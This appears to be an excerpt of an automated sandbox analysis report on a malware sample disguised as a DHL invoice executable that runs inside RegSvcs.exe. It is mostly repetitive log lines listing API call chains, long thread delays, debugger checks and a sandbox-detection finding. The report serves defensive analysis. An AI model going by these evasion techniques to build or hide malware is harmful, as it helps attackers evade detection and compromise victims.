                  Source: Binary string: wntdll.pdbUGP source: DHL DOC INV 191224.gz.exe, 00000000.00000003.2050803231.0000000003880000.00000004.00001000.00020000.00000000.sdmp, DHL DOC INV 191224.gz.exe, 00000000.00000003.2051726881.00000000036E0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: DHL DOC INV 191224.gz.exe, 00000000.00000003.2050803231.0000000003880000.00000004.00001000.00020000.00000000.sdmp, DHL DOC INV 191224.gz.exe, 00000000.00000003.2051726881.00000000036E0000.00000004.00001000.00020000.00000000.sdmp
                  Source: DHL DOC INV 191224.gz.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: DHL DOC INV 191224.gz.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: DHL DOC INV 191224.gz.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: DHL DOC INV 191224.gz.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: DHL DOC INV 191224.gz.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_003342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_003342DE
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_00350A76 push ecx; ret 0_2_00350A89
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_0034F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0034F98E
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_003C1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_003C1C41
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Found API chain indicative of sandbox detection
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-98127
                  Switches to a custom stack to bypass stack traces
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeAPI/Special instruction interceptor: Address: EAFF1C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599653Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599547Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599437Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599328Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599219Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598604Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598474Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598328Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598219Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597989Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595429Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595313Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595200Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595094Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594969Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2545Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7279Jump to behavior
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeAPI coverage: 3.9 %
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_0039DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0039DBBE
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_0036C2A2 FindFirstFileExW,0_2_0036C2A2
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_003A68EE FindFirstFileW,FindClose,0_2_003A68EE
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_003A698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_003A698F
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_0039D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0039D076
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_0039D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0039D3A9
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_003A9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_003A9642
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_003A979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_003A979D
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_003A9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_003A9B2B
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_003A5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_003A5C97
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_003342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_003342DE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599653Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599547Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599437Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599328Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599219Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598604Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598474Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598328Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598219Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597989Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595429Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595313Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595200Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595094Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594969Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593985Jump to behavior
                  Source: RegSvcs.exe, 00000002.00000002.4475356588.00000000031A5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $sqEmultipart/form-data; boundary=------------------------8dd2c94d88c6ec6<
                  Source: RegSvcs.exe, 00000002.00000002.4474554709.000000000131B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_003AEAA2 BlockInput,0_2_003AEAA2
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_00362622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00362622
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_003342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_003342DE
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_00354CE8 mov eax, dword ptr fs:[00000030h]0_2_00354CE8
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_00EB01E8 mov eax, dword ptr fs:[00000030h]0_2_00EB01E8
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_00EB0188 mov eax, dword ptr fs:[00000030h]0_2_00EB0188
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_00EAEB78 mov eax, dword ptr fs:[00000030h]0_2_00EAEB78
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_00390B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00390B62
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_00362622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00362622
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_0035083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0035083F
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_003509D5 SetUnhandledExceptionFilter,0_2_003509D5
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_00350C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00350C21
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
